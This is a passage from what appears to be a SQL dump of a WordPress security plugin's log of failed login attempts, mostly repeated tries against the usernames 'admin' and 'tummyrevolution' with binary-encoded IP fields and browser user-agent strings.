rv:11.0) like Gecko'),(1828,6934,1696758592.788268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1829,6935,1696758595.621229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0E','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1830,6937,1696758700.865097,1,'loginFailValidUsername','admin',1,'$l>;\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1831,6938,1696758702.640560,1,'loginFailValidUsername','admin',1,'$l>;\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1832,6939,1696758741.208839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1833,6940,1696758742.671516,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1834,6941,1696758818.558006,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1835,6942,1696758819.815948,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1836,6943,1696758876.292729,1,'loginFailInvalidUsername','tummyrevolution',0,'*\\xD|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1837,6944,1696758877.849140,1,'loginFailInvalidUsername','tummyrevolution',0,'*\\xD|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1838,6945,1696758959.338385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0m]BX','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1839,6946,1696758960.543656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0m]BX','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1840,6947,1696759017.458848,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0_F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1841,6948,1696759018.722875,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0_F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1842,6949,1696759043.025802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1843,6950,1696759044.566594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1844,6951,1696759195.166177,1,'loginFailValidUsername','admin',1,'*$\Z\0*\0:c1jE\"֗','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1857,6966,1696759644.543816,1,'loginFailInvalidUsername','tummyrevolution',0,' >1jE\"֗','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1858,6967,1696759773.030964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|a','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1859,6968,1696759774.367666,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|a','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1860,6969,1696760301.505830,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1861,6970,1696760302.996357,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1862,6971,1696760779.174066,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0U6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1863,6972,1696760780.495468,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0U6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1864,6973,1696761034.849568,1,'loginFailInvalidUsername','tummyrevolution',0,'*Ղz\0\0|q\n,!F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1865,6974,1696761036.438119,1,'loginFailInvalidUsername','tummyrevolution',0,'*Ղz\0\0|q\n,!F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1866,6975,1696761320.973928,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0PP','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1867,6976,1696761322.355103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0PP','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1868,6977,1696761786.214925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Gt','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1869,6978,1696761787.603526,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Gt','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1870,6981,1696762648.890333,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0oXM/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1871,6982,1696762650.790664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0oXM/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1872,6983,1696762916.170056,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1873,6984,1696762917.713437,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1874,6985,1696763398.448610,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0ȗ++|\r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1875,6986,1696763400.068350,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0ȗ++|\r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1876,6989,1696764713.191893,1,'loginFailInvalidUsername','tummyrevolution',0,'*\0%ȅBa','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1877,6990,1696764714.800487,1,'loginFailInvalidUsername','tummyrevolution',0,'*\0%ȅBa','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1878,6991,1696765249.343233,1,'loginFailInvalidUsername','tummyrevolution',0,' r@L\0:b:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1879,6992,1696765250.721997,1,'loginFailInvalidUsername','tummyrevolution',0,' r@L\0:b:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1880,6993,1696765263.751295,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1881,6994,1696765264.946933,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1882,6995,1696765516.723760,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1883,6996,1696765517.927574,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0^','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1884,6997,1696765631.855487,1,'loginFailInvalidUsername','tummyrevolution',0,'*\\I߹~eYG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1885,6998,1696765633.182472,1,'loginFailInvalidUsername','tummyrevolution',0,'*\\I߹~eYG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1886,7000,1696766221.440298,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1887,7001,1696766223.021421,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1888,7002,1696766579.107310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g\ntB','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1889,7003,1696766580.564612,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g\ntB','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1890,7004,1696766683.685859,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1891,7004,1696766683.694794,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1892,7005,1696766685.032946,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1893,7005,1696766685.040068,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1894,7006,1696766693.179806,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1895,7007,1696766694.778502,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1896,7010,1696767491.371615,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Ow','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1897,7011,1696767492.968107,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0Ow','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1898,7012,1696767638.405044,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\ZnY','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1899,7013,1696767639.855027,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\ZnY','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1900,7014,1696768512.093275,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ibc7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1901,7015,1696768513.873781,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ibc7','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1902,7018,1696768968.511066,1,'loginFailValidUsername','admin',1,' a] ZL\'','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1903,7019,1696768969.921670,1,'loginFailValidUsername','admin',1,' a] ZL\'','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1904,7020,1696769066.077962,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\ZnY','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1905,7021,1696769067.826364,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\ZnY','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1906,7022,1696769124.965596,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1907,7023,1696769126.427714,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1908,7026,1696769996.224652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1909,7026,1696769996.233919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1910,7027,1696769997.810762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1911,7027,1696769997.817734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1912,7029,1696770284.488902,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0\0Ȁ z?Gvu','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1913,7030,1696770285.736890,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0\0Ȁ z?Gvu','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1914,7033,1696771703.639803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\'>\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1915,7034,1696771705.313103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\'>\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1916,7035,1696771828.195084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1917,7036,1696771829.587822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1918,7037,1696772600.163579,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1919,7038,1696772601.523570,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1920,7039,1696773146.777109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1921,7040,1696773148.618677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1922,7041,1696774181.828514,1,'loginFailValidUsername','admin',1,'(u_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1923,7042,1696774183.427953,1,'loginFailValidUsername','admin',1,'(u_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1924,7044,1696774815.720248,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0WU','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1925,7045,1696774817.510485,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0WU','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1926,7046,1696774989.249392,1,'loginFailInvalidUsername','tummyrevolution',0,' r# 1ȬtV','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1927,7047,1696774990.666681,1,'loginFailInvalidUsername','tummyrevolution',0,' r# 1ȬtV','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1928,7048,1696775068.600611,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\rr','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1929,7049,1696775069.852648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\rr','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1930,7053,1696775533.604181,1,'loginFailValidUsername','admin',1,'$\\gY;z\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1931,7054,1696775535.217869,1,'loginFailValidUsername','admin',1,'$\\gY;z\"','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1932,7056,1696775933.370408,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0FQ<','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1933,7057,1696775934.570476,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0FQ<','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1934,7058,1696776413.989233,1,'loginFailValidUsername','admin',1,'$ @@EH','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1935,7059,1696776416.448728,1,'loginFailValidUsername','admin',1,'$ @@EH','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1936,7060,1696776598.582300,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>o','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1937,7061,1696776599.866846,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0>o','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1938,7062,1696777282.974618,1,'loginFailValidUsername','Sara',2,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(1939,7065,1696778126.661407,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0/\\3|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1940,7066,1696778128.091991,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0/\\3|','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1941,7067,1696778715.139538,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0-H','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1942,7068,1696778716.881027,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0-H','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1943,7071,1696780546.202259,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1944,7072,1696780548.754171,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1945,7073,1696780810.884330,1,'loginFailInvalidUsername','tummyrevolution',0,' إxh q','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1946,7074,1696780812.488983,1,'loginFailInvalidUsername','tummyrevolution',0,' إxh q','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1947,7075,1696781103.823623,1,'loginFailInvalidUsername','tummyrevolution',0,'* |\n\n\0rnL','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1948,7076,1696781105.306973,1,'loginFailInvalidUsername','tummyrevolution',0,'* |\n\n\0rnL','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1949,7077,1696782336.293835,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0m]]','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1950,7078,1696782338.133052,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0m]]','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1951,7079,1696783291.729899,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1952,7079,1696783291.739554,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1953,7080,1696783293.301701,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1954,7080,1696783293.308934,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0*','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1955,7081,1696783524.882569,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0T','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1956,7084,1696784523.126446,1,'loginFailInvalidUsername','tummyrevolution',0,'((1k9nB`','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1957,7085,1696784524.860276,1,'loginFailInvalidUsername','tummyrevolution',0,'((1k9nB`','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1958,7086,1696784811.469059,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0oX;','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1959,7087,1696784813.268986,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0oX;','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1960,7088,1696784952.015965,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0o{','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1961,7089,1696784953.437052,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0o{','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1962,7090,1696785451.052558,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0^+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1963,7091,1696785452.852306,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0^+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1964,7092,1696785681.625562,1,'loginFailValidUsername','admin',1,'(\0Pj4Y','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1965,7093,1696785683.199742,1,'loginFailValidUsername','admin',1,'(\0Pj4Y','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1966,7096,1696787006.711154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_,','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1967,7097,1696787008.410992,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_,','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1968,7098,1696787134.314356,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1969,7099,1696787135.661831,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1970,7100,1696787356.962014,1,'loginFailValidUsername','admin',1,' a] ZL\'','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1971,7101,1696787358.671153,1,'loginFailValidUsername','admin',1,' a] ZL\'','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1972,7102,1696788428.168044,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0FQ<','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1973,7103,1696788429.357079,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0FQ<','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1974,7104,1696788477.858914,1,'loginFailValidUsername','admin',1,'&\0cLhz','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1975,7105,1696788479.128904,1,'loginFailValidUsername','admin',1,'&\0cLhz','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1976,7108,1696788635.470645,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ɶ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1977,7109,1696788637.161174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0ɶ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1978,7112,1696789649.799301,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1979,7113,1696789651.758463,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1980,7114,1696789723.061085,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0I\r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1981,7115,1696789724.624400,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0I\r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like 